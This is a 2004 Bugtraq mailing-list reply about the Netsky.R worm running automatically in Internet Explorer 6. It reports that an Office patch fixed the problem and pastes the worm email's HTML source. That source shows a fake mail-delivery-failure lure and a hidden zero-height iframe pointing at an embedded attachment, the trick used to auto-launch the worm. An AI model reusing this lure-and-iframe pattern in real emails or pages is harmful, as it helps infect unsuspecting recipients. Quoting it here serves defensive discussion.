Date: Tue, 6 Apr 2004 13:07:57 -0400
From: BugtraQ <bugtraqFolder@...services.com>
To: bugtraq@...urityfocus.com
Subject: RE: Netsky.R, auto execute w/ IE6 ?

Thanks Jim, and all who replied.  Updating MS Office w/ latest patches
solved the problem.  It appears it was the iframe issue you mentioned.

Here is the message source for those who asked:
<HTML><HEAD>

<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff><br>Mail Delivery - This mail couldn't be
displayed<br><br>------------- failed message
-------------<br>?2a$dmd-ekH-U?3C)7>JA!p|jxvM>g;öOigLW*8hiE<br>G1!K&o*(yßKAL
#s7sMJwAmS2105NtW3%efpG7?$V)4(vf#><br>jHtC8HWc4VfUgtU2l55aWMD.PJK7.YD8bä:)pa
ssage has been sent as a binary attachment.<br>

Or you can view the message at:<br><br>
width=0>www.targetdomain.com/inmail/webmaster/mread.php?sessionid-20302</a>
<iframe
src=cid:121401Mfdab4$3f3dL780$75387018@...81fa70Re height=0